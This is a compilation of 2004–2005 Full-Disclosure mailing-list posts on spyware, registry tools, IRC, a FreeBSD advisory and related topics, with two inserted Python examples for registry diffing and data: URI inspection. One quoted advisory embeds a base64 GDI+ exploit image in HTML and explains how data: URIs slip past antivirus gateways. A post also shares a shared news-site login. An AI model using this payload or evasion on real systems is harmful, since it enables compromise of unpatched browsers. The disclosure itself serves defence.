[Full-Disclosure] No such thing as spyware
From: http://www.viruslist.com/en/weblog

Thoughts?

No such thing as spyware
Eugene
March 03, 2005 | 22:21 MSK

The rising number of cyber-criminals creating more and more different malicious programs, attacks and cyber-frauds has resulted in the media and public paying more attention to security issues. New solutions and services, such as patch and vulnerability management, intrusion prevention, etc., appeared during the last year or so. New threats are appearing as well. But are they really all that new?

Spyware is a brand new word in the threats list and it is being used widely. Everyone is talking about spyware: many dedicated anti-spyware products have appeared on the market, all of them brand new. But what exactly is spyware? What threats does the new term cover?

My favorite definition of the term can be found at Information Week:

Spyware is software that's installed without your informed consent. Spyware communicates personal, confidential information about you to an attacker. The information might be reports on your Web-surfing habits, or the software might be looking for even more sinister information, such as sniffing out your credit card numbers and reporting those numbers.

Exactly. This is a good definition which we can use to describe software designed to spy on user actions and report on infected machines. Did we have such software in the past? Of course we did. The first malicious software designed to spy and steal confidential information was detected back in 1996 - the AOL Password-Stealing Trojans. Have we already seen other malicious programs which can be described as spyware? Certainly! There are many different kinds of Trojans designed to:

* steal passwords/logins (including bank account information)
* log user activity (keyboard, screenshots, applications being run)
* backdoor trojans which have spy abilities

Thus, what people are calling spyware is not new at all... Anything else that can be called spyware? Yes.

Numerous advertising tools (adware/advware) which report such information as visited Web pages and Web search requests. Sometimes this information is confidential. And there's even more. Legitimate keyloggers, for example, freeware/shareware/commercial utilities which log keystrokes and/or monitor other user activities.

Are we done? No, there are still more programs that report user information to outside sources. For example, if you post to a forum your email client will report your email address. If you are browsing the Internet your IP address, Windows and browser version can all be logged as you surf. Can we or should we class these programs as spyware? Definitely not.

This is where we reach the border between so-called spyware and non-spyware. And the border is fuzzy. Because the issue is not always what the program does, but how it's being used. We call the border-line programs riskware, and detect many of them as 'not-a-virus'. We leave it up to users to decide what to do next: if they want or need the program, they can keep it. However, if it was installed without their consent or is doing something they don't want or need, we find it for them, so they know what's going on in their computer and can make an informed choice.

So, technically speaking, spyware simply doesn't exist as a stand-alone cyberthreat. The programs which are being called spyware are, from a technical point of view, simply a limited sub-set of Trojans, advertising software and some riskware:

* Trojan spies and some backdoors
* most adware
* riskware: potentially hostile programs that require users to make conscious choices about using them

In short, there is no such thing as spyware.

On the other hand there are many anti-spyware programs produced by vendors who actively promote their products as dedicated anti-spyware solutions. An interesting review was published in the latest PC Magazine {USA edition, Feb 22 2005, pages 82-91}.

They compared how a number of security suites (anti-viruses) and dedicated anti-spyware products removed so-called spyware. Guess what? Some traditional solutions are better at removing these threats than dedicated ones. Unfortunately, there are no adequate consumer tests to separate effective solutions from ersatz-security programs. In the PC Magazine tests, there were only 24 spyware samples tested. In reality, there are hundreds of malicious programs in the wild that fit into this category. For instance, we know of over 200 adware families (with numerous variants in each). We need better and more in-depth tests in the future.

To cut a long story short, the term spyware is basically a marketing gimmick: just to separate new ersatz-security products from traditional ones, just to push almost zero-value products to the security market. We need to avoid this trap. There is nothing worse for the computer security community than
[Full-Disclosure] Windows Registry Analyzer
Anyone know of any free tools to analyze what changes have been made to a Windows 2000/XP registry? Thanks, ...D ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Windows Registry Analyzer
On Thu, 3 Mar 2005 16:14:03 -, Cassidy Macfarlane [EMAIL PROTECTED] wrote:
> You can, of course, use regmon (sysinternals.com) to monitor the registry 'live' while changes are being made, however it sounds like you want a product that would analyse the reg, then re-analyse after installation, and report on changes. This would indeed be a handy tool. Anyone know of anything better than regmon for this purpose?

You read my registry, I mean, mind.

Thanks everyone for your suggestions. So far, the following has been tossed my way:

1) WinINSTALL LE - it's on every Windows 2000 Pro CD I've ever seen
*I will look into this one.
2) Regmon of course, from Sysinternals
*Which from my understanding only states what changes are being made in real time.
3) Regshot
*Never heard of it, but will give it a go.

That's it so far. I will post my results.

Cheers,
...D
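A worked version of the snapshot-and-compare approach the thread is asking for, as an added example (Python; it is not a tool from any post in the thread). It assumes two regedit exports taken before and after the installation; on Windows 2000/XP `reg export <key> <file>` and regedit's File > Export produce that format (Version 5.00 exports are UTF-16LE with a BOM, so read them with encoding="utf-16"; older REGEDIT4 exports are ANSI). The two exports embedded in the block are constructed samples, not real registry contents, and the value names in them are made up.

```python
"""Registry snapshot diff.

Added example for this thread, not a tool from any post in it: the workflow
the thread asks for (snapshot, install, snapshot again, report what changed)
done over two regedit exports.  The two exports below are constructed.
"""
import re
from typing import Dict

RegTree = Dict[str, Dict[str, str]]     # key path -> {value name -> raw data}

KEY_RE = re.compile(r"^\[(.+)\]$")
# "name"=data or @=data (the default value).  Data is kept as raw text so the
# comparison is exact for every type: "string", dword:..., hex:..., hex(2):...
VALUE_RE = re.compile(r'^(@|"(?:[^"\\]|\\.)*")=(.*)$')


def parse_reg_export(text: str) -> RegTree:
    """Parse a REGEDIT4 / 'Version 5.00' export into {key: {name: data}}."""
    tree: RegTree = {}
    current = None
    pending = ""        # a hex value continued over lines with a trailing '\'
    for raw in text.splitlines():
        line = raw.strip()
        if pending:
            pending += line.rstrip("\\").strip()
            if line.endswith("\\"):
                continue
            line, pending = pending, ""
        elif not line or line.startswith(("Windows Registry Editor", "REGEDIT4", ";")):
            continue
        elif line.endswith("\\"):
            pending = line.rstrip("\\")
            continue
        m = KEY_RE.match(line)
        if m:
            current = m.group(1)
            tree.setdefault(current, {})
            continue
        if current is None:
            raise ValueError(f"value before any [key] header: {line!r}")
        m = VALUE_RE.match(line)
        if not m:
            raise ValueError(f"cannot parse value under {current}: {line!r}")
        tree[current][m.group(1)] = m.group(2)
    return tree


def diff_snapshots(before: RegTree, after: RegTree) -> Dict[str, list]:
    """Keys and values added, removed or changed between two snapshots."""
    report: Dict[str, list] = {"keys_added": [], "keys_removed": [], "values_added": [],
                               "values_removed": [], "values_changed": []}
    for key in sorted(after.keys() - before.keys()):
        report["keys_added"].append(key)
        # a new key's contents matter as much as the key itself (what does the
        # new Run entry launch?), so list its values as additions too
        report["values_added"] += [(key, n, d) for n, d in sorted(after[key].items())]
    for key in sorted(before.keys() - after.keys()):
        report["keys_removed"].append(key)
        report["values_removed"] += [(key, n, d) for n, d in sorted(before[key].items())]
    for key in sorted(before.keys() & after.keys()):
        old, new = before[key], after[key]
        report["values_added"] += [(key, n, new[n]) for n in sorted(new.keys() - old.keys())]
        report["values_removed"] += [(key, n, old[n]) for n in sorted(old.keys() - new.keys())]
        report["values_changed"] += [(key, n, old[n], new[n])
                                     for n in sorted(old.keys() & new.keys()) if old[n] != new[n]]
    return report


# --- constructed sample exports (made-up keys and values, not a real system) --
BEFORE = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"ctfmon.exe"="C:\\WINDOWS\\system32\\ctfmon.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Example\Widget]
@="1.0"
"Flags"=dword:00000001
'''

AFTER = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"ctfmon.exe"="C:\\WINDOWS\\system32\\ctfmon.exe"
"WidgetHelper"="C:\\Program Files\\Widget\\helper.exe /silent"

[HKEY_LOCAL_MACHINE\SOFTWARE\Example\Widget]
@="1.0"
"Flags"=dword:00000003

[HKEY_LOCAL_MACHINE\SOFTWARE\Example\Widget\Hooks]
"Blob"=hex:01,02,03,04,05,06,07,08,09,0a,0b,0c,0d,0e,0f,10,11,12,13,14,\
  15,16,17,18
'''


def sample_report() -> Dict[str, list]:
    return diff_snapshots(parse_reg_export(BEFORE), parse_reg_export(AFTER))


if __name__ == "__main__":
    for section, entries in sample_report().items():
        for entry in entries:
            print(section + ":", " | ".join(entry) if isinstance(entry, tuple) else entry)
```

For a real run, replace BEFORE and AFTER with the contents of the two export files (open(path, encoding="utf-16").read() for Version 5.00 exports). Exporting a subtree rather than the whole hive (the Run keys, Services, the uninstall list) keeps the report readable, but note that live-monitoring with regmon still has a place: an export only shows the end state, not values that were written and deleted again during the install.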
Re: [Full-Disclosure] PivX Solutions
On Fri, 25 Feb 2005 20:17:44 + GMT, Jason Coombs [EMAIL PROTECTED] wrote:
> Regarding PivX Solutions, Anyone who has any information about PivX Solutions, please contact me as soon as possible.

Don't you work for PivX? What information could you be looking for?

...D
[Full-Disclosure] Mouseover URL spoof with IE
Can the URL displayed on a mouseover in IE be spoofed?

Thank you,
...D
Re: [Full-Disclosure] Microsoft to buy Sybari AV company
On Tue, 8 Feb 2005 17:51:16 +0100 (CET), Feher Tamas [EMAIL PROTECTED] wrote:
> http://news.zdnet.com/2100-1009_22-5567529.html
> GeCad RAV, GIANT and now Sybari Antivirus. Microsoft swallows smaller anti-malware firms one by one. When the last one is gone, MS will probably eat the larger ones, too. Finally all kind of desktop and server security will be owned by MS and W.H.G. III will rule.

The hidden message behind all of these acquisitions that Microsoft doesn't want you to know: Microsoft is admitting their software is horribly insecure and their solution to the problem is to acquire reactive anti-malware software to clean up the crap that got in because their software has more holes than the screen in my patio door.

Further, if Microsoft thinks acquisitions will solve all of their problems, why don't they acquire a company with programmers that have some clue about security and its place in software that is plugged into a network.

Who are they fooling! (Well, sadly, most people except for those reading this email.)

Happy patching,
...D
Re: [Full-Disclosure] Google.com down?
On Fri, 14 Jan 2005 18:14:32 -0600, Ron [EMAIL PROTECTED] wrote:
> I just tried to do a google search, and the connection timed out. Coincidentally, I had to dial back into the Internet. After dialing back in, I figured I'd alert everybody that Google might be down!

I just tried to do a google search, and the connection timed out. I don't understand how this could happen to me. I mean, my ISP never goes down, my Windows XP TCP/IP stack and DNS resolve cache never lose their brains, and my Internet Exploiter cache and cookies never cause me problems. Google: fix your servers!

drip... dripdrip... it reeks like sarcasm in here.

...D
Re: [Full-Disclosure] I thought Microsoft were releasing new security patches today (11 Jan 2005)?
On Tue, 11 Jan 2005 15:13:45 -, Mike Diack [EMAIL PROTECTED] wrote:
> Where are they?

They are probably patching their patch release system. :)

Expect them in a couple of hours. Patience grasshopper, patience...

...D
Re: [Full-Disclosure] Multi-vendor AV gateway image inspection bypass vulnerability
On Mon, 10 Jan 2005 14:08:11 -0500, Darren Bounds [EMAIL PROTECTED] wrote:

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Multi-vendor AV gateway image inspection bypass vulnerability
January 10, 2005

A vulnerability has been discovered which allows a remote attacker to bypass anti-virus (as well as other security technologies such as IDS and IPS) inspection of HTTP image content by leveraging techniques described in RFC 2397 for base64 encoding image content within the URL scheme. A remote attacker may encode a malicious image within the body of an HTML formatted document to circumvent content inspection.

For example: http://www.k-otik.com/exploits/09222004.ms04-28-cmd.c.php

The source code at the URL above will by default create a JPEG image that will attempt (and fail without tweaking) to exploit the Microsoft MS04-028 GDI+ vulnerability. The image itself is detected by all AV gateway engines tested (Trend, Sophos and McAfee), however, when the same image is base64 encoded using the technique described in RFC 2397 (documented below), inspection is not performed and it is delivered and rendered by the client.

While Microsoft Internet Explorer does not support the RFC 2397 URL scheme, Firefox, Safari, Mozilla and Opera do and will render the data and thus successfully execute the payload if the necessary OS and/or application patches have not been applied.
## BEGIN HTML ## html body img src=data:image/gif;base64,/9j/4AAQSkZJRgABAQEAYABgAAD// gAARXhpZgAASUkqAAgAHPD9f0FBQUGWAgAAGgAAABzw /X9BQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQQAAAP/bAEMACAYGBwYFCAcHBwkJ CAoMFA0MCwsMGRITDxQdGh8eHRocHCAkLicgIiwjHBwoNyksMDE0NDQfJzk9ODI8LjM0Mv/b AEMBCQkJDAsMGA0NGDIhHCEyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy MjIyMjIyMjIyMjIyMv/AABEIAAMAAwMBIgACEQEDEQH/xAAfAAABBQEBAQEBAQAA AQIDBAUGBwgJCgv/xAC1EAACAQMDAgQDBQUEBX0BAgMABBEFEiExQQYTUWEHInEUMoGR oQgjQrHBFVLR8CQzYnKCCQoWFxgZGiUmJygpKjQ1Njc4OTpDREVGR0hJSlNUVVZXWFlaY2Rl ZmdoaWpzdHV2d3h5eoOEhYaHiImKkpOUlZaXmJmaoqOkpaanqKmqsrO0tba3uLm6wsPExcbH 
yMnK0tPU1dbX2Nna4eLj5OXm5+jp6vHy8/T19vf4+fr/xAAfAQADAQEBAQEBAQEB AQIDBAUGBwgJCgv/xAC1EQACAQIEBAMEBwUEBAABAncAAQIDEQQFITEGEkFRB2FxEyIygQgU QpGhscEJIzNS8BVictEKFiQ04SXxFxgZGiYnKCkqNTY3ODk6Q0RFRkdISUpTVFVWV1hZWmNk ZWZnaGlqc3R1dnd4eXqCg4SFhoeIiYqSk5SVlpeYmZqio6Slpqeoqaqys7S1tre4ubrCw8TF xsfIycrS09TV1tfY2dri4+Tl5ufo6ery8/T19vf4+fr/2gAMAwEAAhEDEQA/APn+iiigD// Z /body /html ## END HTML ##

Solution: While AV vendor patches are not yet available, fixes for all currently known image vulnerabilities are and have been for several months. If you have not yet applied them, you have your own negligence to blame.

Contributions: Thanks to Scott Roeder and Jacinto Rodriquez for their assistance in platform testing.

I believe TrendMicro's OfficeScan (client-server scanner) will catch it, but I am not sure about their gateway device. What was their response?

...D
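An added example, not code from the advisory or from any vendor: the extraction step an inspection engine needs before it can scan an image that travels inline in a data: URI. It parses the RFC 2397 form, strips whitespace the way browsers do before base64-decoding (the advisory's own HTML wraps its payload across lines, and a scanner that rejects that as malformed base64 has just let the browser see bytes it never inspected), and compares the declared media type with the content's leading bytes. That last check is not academic: the first characters of the advisory's payload, /9j/4AAQSkZJRg..., decode to a JFIF (JPEG) header although the URI declares image/gif, and browsers render by sniffing, not by the declared type. The sample HTML in the block is constructed and carries only a 20-byte JFIF header, not the exploit image; the findings() rules are this example's choices, not any product's.

```python
"""RFC 2397 data: URI extraction for content inspection.

Added example for the advisory above, not code from it.  A gateway that only
scans objects fetched over HTTP never sees an image carried inline in a data:
URI, so the inspector has to find those URIs in the HTML, decode them the way
a browser does (whitespace and all), and hand the bytes to the same checks it
applies to a normal image.  The sample HTML below is constructed.
"""
import base64
import html
import re
from typing import List, NamedTuple, Optional
from urllib.parse import unquote_to_bytes

# data:[<mediatype>][;base64],<data>            (RFC 2397, section 2)
DATA_URI_RE = re.compile(r"data:([^,]*?)(;base64)?,(.*)", re.IGNORECASE | re.DOTALL)
# src= / href= attribute values: double-quoted, single-quoted or bare
ATTR_RE = re.compile(r"""\b(?:src|href)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))""",
                     re.IGNORECASE)
MAGIC = [
    (b"\xff\xd8\xff", "image/jpeg"),
    (b"GIF87a", "image/gif"),
    (b"GIF89a", "image/gif"),
    (b"\x89PNG\r\n\x1a\n", "image/png"),
    (b"MZ", "application/x-msdownload"),
]


class InlineObject(NamedTuple):
    declared_type: str
    sniffed_type: Optional[str]
    data: bytes


def sniff(data: bytes) -> Optional[str]:
    """Identify the content by its leading bytes, ignoring what the URI claims."""
    for magic, mtype in MAGIC:
        if data.startswith(magic):
            return mtype
    return None


def parse_data_uri(uri: str) -> InlineObject:
    m = DATA_URI_RE.fullmatch(uri.strip())
    if not m:
        raise ValueError(f"not a data: URI: {uri[:40]!r}")
    # media type is everything before the first ';' (parameters such as
    # charset= follow it); RFC 2397 defaults to text/plain when it is absent
    mediatype = m.group(1).split(";")[0].strip().lower() or "text/plain"
    payload = m.group(3)
    if m.group(2):
        # Browsers decode "forgiving" base64: ASCII whitespace is dropped
        # first, so a payload wrapped across lines (as in the advisory's HTML)
        # still decodes.  Restore the padding the wrapping may have lost.
        compact = re.sub(r"\s+", "", payload)
        compact += "=" * (-len(compact) % 4)
        data = base64.b64decode(compact)
    else:
        data = unquote_to_bytes(payload)          # %XX-encoded form
    return InlineObject(mediatype, sniff(data), data)


def extract_inline_objects(document: str) -> List[InlineObject]:
    """Every data: URI found in a src= or href= attribute of the document."""
    found = []
    for m in ATTR_RE.finditer(document):
        value = html.unescape(next(g for g in m.groups() if g is not None))
        if value.lstrip().lower().startswith("data:"):
            found.append(parse_data_uri(value))
    return found


def findings(obj: InlineObject) -> List[str]:
    """What to flag before (or instead of) passing the bytes to the renderer."""
    out = []
    if obj.sniffed_type is None:
        out.append(f"unrecognised content declared as {obj.declared_type}")
    elif obj.sniffed_type != obj.declared_type:
        # the advisory's payload does exactly this: declared image/gif, bytes are JFIF
        out.append(f"declared {obj.declared_type} but content is {obj.sniffed_type}")
    if obj.sniffed_type == "application/x-msdownload":
        out.append("PE executable carried inline")
    return out


# --- constructed sample: a bare JFIF header declared as image/gif and wrapped
# across lines like the advisory's HTML.  Only a header, not an exploit image.
JFIF_HEAD = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00\x01\x01\x01\x00\x60\x00\x60\x00\x00"
SAMPLE_B64 = base64.b64encode(JFIF_HEAD).decode()
SAMPLE_HTML = ('<html><body><img src="data:image/gif;base64,'
               + "\n".join(SAMPLE_B64[i:i + 16] for i in range(0, len(SAMPLE_B64), 16))
               + '"></body></html>')


def scan_sample() -> List[List[str]]:
    return [findings(o) for o in extract_inline_objects(SAMPLE_HTML)]


if __name__ == "__main__":
    for obj, flags in zip(extract_inline_objects(SAMPLE_HTML), scan_sample()):
        print(obj.declared_type, obj.sniffed_type, len(obj.data), "bytes", flags)
```

In a gateway the decoded bytes would go to the same engine that scans a plain image response; this block stops at the type check because that is the part the advisory shows was missing. Attributes other than src and href (CSS url(), script-built URIs) are out of scope of the regex and need the same treatment.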
Re: [Full-Disclosure] Re: Full-Disclosure digest, Vol 1 #2093 - 36 msgs
There is a security update, I just noticed it.

Security Update 2004-12-02 delivers a number of security enhancements and is recommended for all Macintosh users. This update includes the following components:

Apache
AppKit
HIToolbox
Kerberos
Postfix
PSNormalizer
Safari
Terminal

For detailed information on this Update, please visit this website: http://www.info.apple.com/kbnum/n61798

On 2-Dec-04, at 3:32 PM, Randall Craig wrote:
> On Thu, 2 Dec 2004 10:58:02 -0600, Randall Craig [EMAIL PROTECTED] wrote:
> Ok I am super duper new to this list and also new to *nix... i will never go back to M$ ceptin for gaming purposes... I am running on OS X.3.3 and was wanting to know if the Security Alert pertaining to FreeBSD would also affect my system. I know that BSD is running underneath OS X... I am fairly sure that Apple is aware of it by now-.
>
> thnx
> n0 r3m0r53
>
> ### FreeBSD-SA-04:17.procfs Security Advisory
> The FreeBSD Project
>
> Topic: Kernel memory disclosure in procfs and linprocfs
> Category: core
> Module: sys
> Announced: 2004-12-01
> Credits: Bryan Fulton, Ted Unangst, and the SWAT analysis tool Coverity, Inc.
> Affects: All FreeBSD releases
> Corrected: 2004-12-01 21:33:35 UTC (RELENG_5, 5.3-STABLE)
>            2004-12-01 21:34:23 UTC (RELENG_5_3, 5.3-RELEASE-p2)
>            2004-12-01 21:34:43 UTC (RELENG_5_2, 5.2.1-RELEASE-p13)
>            2004-12-01 21:33:57 UTC (RELENG_4, 4.10-STABLE)
>            2004-12-01 21:35:10 UTC (RELENG_4_10, 4.10-RELEASE-p5)
>            2004-12-01 21:35:57 UTC (RELENG_4_8, 4.8-RELEASE-p27)
> CVE Name: CAN-2004-1066
>
> For general information regarding FreeBSD Security Advisories, including descriptions of the fields above, security branches, and the following sections, please visit <URL:http://www.freebsd.org/security/>.
>
> I. Background
>
> The process file system, procfs(5), implements a view of the system process table inside the file system. It is normally mounted on /proc, and is required for the complete operation of programs such as ps(1) and w(1). The Linux process file system, linprocfs(5), emulates a subset of Linux's process file system and is required for the complete operation of some Linux binaries.
>
> II. Problem Description
>
> The implementation of the /proc/curproc/cmdline pseudofile in the procfs(5) file system on FreeBSD 4.x and 5.x, and of the /proc/self/cmdline pseudofile in the linprocfs(5) file system on FreeBSD 5.x reads a process' argument vector from the process address space. During this operation, a pointer was dereferenced directly without the necessary validation steps being performed.
>
> III. Impact
>
> A malicious local user could perform a local denial of service attack by causing a system panic; or he could read parts of kernel memory. Such memory might contain sensitive information, such as portions of the file cache or terminal buffers. This information might be directly useful, or it might be leveraged to obtain elevated privileges in some way. For example, a terminal buffer might contain a user-entered password.
>
> FreeBSD 4.x does not implement the /proc/self/cmdline pseudofile in its linprocfs(5) file system, and is therefore only affected if the procfs(5) file system is mounted. In its default configuration, FreeBSD 5.x does not utilize procfs(5) or linprocfs(5) and will therefore be unaffected by this vulnerability unless the configuration is changed.
>
> IV. Workaround
>
> Unmount the procfs and linprocfs file systems if they are mounted. Execute the following command as root:
>
> umount -A -t procfs,linprocfs
>
> Also, remove or comment out any lines in fstab(5) that reference `procfs' or `linprocfs', so that they will not be re-mounted at next reboot.
>
> V. Solution
>
> Perform one of the following:
>
> 1) Upgrade your vulnerable system to 4-STABLE or 5-STABLE, or to the RELENG_5_3, RELENG_5_2, RELENG_4_10, or RELENG_4_8 security branch dated after the correction date.
>
> 2) To patch your present system:
>
> The following patches have been verified to apply to FreeBSD 4.8, 4.10, 5.2, and 5.3 systems.
>
> a) Download the relevant patch from the location below, and verify the detached PGP signature using your PGP utility.
>
> [FreeBSD 4.x]
> # fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-04:17/procfs4.patch
> # fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-04:17/procfs4.patch.asc
>
> [FreeBSD 5.x]
> # fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-04:17/procfs5.patch
> # fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-04:17/procfs5.patch.asc
>
> b) Apply the patch.
>
> # cd /usr/src
> # patch < /path/to/patch
>
> c) Recompile your kernel as described in <URL:http://www.freebsd.org/handbook/kernelconfig.html> and reboot the system.
>
> VI. Correction details
>
> The following list contains the
[Full-Disclosure] makelovenotspam website defaced
Lycos' anti-spammer DoS screensaver download website may have been defaced: http://www.f-secure.com/weblog/

What a defacing week so far...

...D
Re: [Full-Disclosure] Network Sniffing
On Tue, 30 Nov 2004 13:39:02 -0500, Crehan, Joe (EM, ITS, Contractor) [EMAIL PROTECTED] wrote:
> Gentlemen,
> I have been having all kinds of quirky network problems at one of my facilities. I always used SnifferPro to identify top talkers and babbling machines. Now that I work for The Hive I am no longer allowed to purchase licenses for such wonderful products. So the question is more of a poll of what the best of the best use for their networks. M$ and *NIX cheap and free.

ntop. Ethereal.

...D
Re: [Full-Disclosure] Network Sniffing
On Tue, 30 Nov 2004 13:08:12 -0700, Ben Nelson [EMAIL PROTECTED] wrote:
> -BEGIN PGP SIGNED MESSAGE-
> Hash: SHA1
>
> Take a look at: http://www.insecure.org/tools.html
[...]

Note: The FBI is monitoring HTTP logs from insecure.org.
http://slashdot.org/article.pl?sid=04/11/25/1835238&from=rss

...D
Re: [Full-Disclosure] Is www.sco.com hacked?
On Mon, 29 Nov 2004 14:58:25 +0200, Rossen Naydenov [EMAIL PROTECTED] wrote:
> -BEGIN PGP SIGNED MESSAGE-
> Hash: SHA1
>
> Hi guys,
> I just noticed the banner on www.sco.com
> If you didn't see it (because it is removed) this is what they say: We own all your code pay us all your money
> Or is it some commercial trick?

Hacked... see www.neowin.net for a screenshot.

...D
Re: [Full-Disclosure] Why is IRC still around?
On Tue, 23 Nov 2004 20:21:45 +0100, nicolas vigier [EMAIL PROTECTED] wrote:
> Are you really serious ? Is it a joke ?

Dude, I am seriously a naive idiot who just wanted to rant about the people that abuse IRC. Hopefully this was just a momentary brain fart, otherwise I might be in trouble, eh? Often there is humour in such circumstances; I had a few laughs in the process. Shit! Maybe I will meet my future wife on IRC! I would invite everyone from F-D.

> This reminds me of some stupid article I read on nytimes: http://www.nytimes.com/2004/05/06/technology/circuits/06chat.html (account required, if you don't have one try ptramo/ptramo)

What a stupid article. The author has it all wrong! IRC is a bed of roses with Celine Dion playing in the background.

...D
Re: [Full-Disclosure] Why is IRC still around?
On Fri, 19 Nov 2004 17:10:13 -0500, Tim [EMAIL PROTECTED] wrote:
>> My mistake; I was referring to the discussion, collaboration, and creation, not the spread.
>
> You mentioned DDoS attacks below. I don't believe that use is a form of discussion, collaboration, or creation.
>
>> Some say we should, but I am not one of those. My point was to get rid of the most well established tool (and easiest to use) for these types of activities.
>
> Any tool can be used by anyone for good or evil. If one knows the kiddies are all hanging out on IRC, then you can get a lot of good info about what their new attacks are by loitering on their channels.
>
>> What's the difference? IRC is so well established for the type of activity I am referring to.
>
> As it is established for many productive things. Ever check out freenode?
>
>> I'll leave the piracy battle for someone else - I just mentioned it as a part of the problem.
>
> If you aren't prepared to defend it on this list, better not mention it. =)
>
>> Sure netcat is an alternative, but which one is easier to use?
>
> Um... netcat, or raw tcp sockets. I would argue it is easier to write something that just opens a connection, and listens for commands to come back, than something that has to speak IRC. Speaking IRC has its own advantages, but in the absence of it, it is still trivial to manage a bot net.
>
>> I thought I would throw out the idea. If you want to call me a troll, then so be it, but don't get your panties in a knot over the whole thing
>
> Pardon my harsh reply. It wasn't personal, and is directed only at your reasoning. It is a similar reasoning that leads to the slippery slope toward censorship.

No worries. Case closed. :)

...D
Re: [Full-Disclosure] Sober.I worm is here
On Fri, 19 Nov 2004 14:39:13 -0600, Bowes, Ronald (EST) [EMAIL PROTECTED] wrote:
> How does it infect somebody if it's using a .txt file?

They (people uneducated in Windows file extensions) think it's a txt file.

...D
Re: [Full-Disclosure] Why is IRC still around? (Because anything less would be uncivilized)
On Fri, 19 Nov 2004 22:48:46 +, Andrew Smith [EMAIL PROTECTED] wrote:
>> Well, fellow F-D'ers, thanks to the vast array of intelligence and experience found on this list, my rant about abolishing IRC has been proven to be far from a solution.
>
> I... can't tell if it's sarcasm or not, damn those trolls and their mind poisoning ways.

I am serious. That concludes this topic.

...D
Re: [Full-Disclosure] Why is IRC still around?
On Fri, 19 Nov 2004 13:54:30 -0500, bkfsec [EMAIL PROTECTED] wrote:
> Danny wrote:
>> Well, it sure does help the anti-virus (anti-malware) and security consulting business, but besides that... is it not safe to say that:
>> 1) A hell of a lot of viruses/worms/trojans use IRC to wreak further havoc?
>> 2) A considerable amount of script kiddies originate and grow through IRC?
>> 3) A wee bit of software piracy occurs?
>> 4) That many organized DoS attacks through PC zombies are initiated through IRC?
>> 5) The anonymity of the whole thing helps to foster all the illegal and malicious activity that occurs?
>> The list goes on and on...
>> Sorry to offend those that use IRC legitimately (LOL - find something else to chat with your buddies), but why the hell are we not pushing to sunset IRC? What would IT be like today without IRC (or the like)? Am I narrow minded to say that it would be a much safer place?
>
> I don't think that it would have any impact at all with regard to stopping malware and crackers. Even if the legitimate IRC servers were shut down, it would still be a simple matter for them to create their own servers on non-standard ports. Barring their ability to do that, they'll completely move to IM or P2P protocols (like WASTE) to carry out their attacks. They've already created the tools to do this and they're actively doing it right now.
>
> In fact, in this regard IRC is a godsend with regard to tracking down attackers. It's easier to determine the location of an IRC bot and to track unencrypted IRC traffic than it is to track WASTE packets or IM connections. Protocols (and their implementations) aren't causing the illegal activity as much as the drive to carry out illegal acts is.

Fair enough... I just need to be enlightened.

Thanks for your time.

...D
Re: [Full-Disclosure] Why is IRC still around?
On Fri, 19 Nov 2004 14:47:31 -0500, Keith Pachulski [EMAIL PROTECTED] wrote:
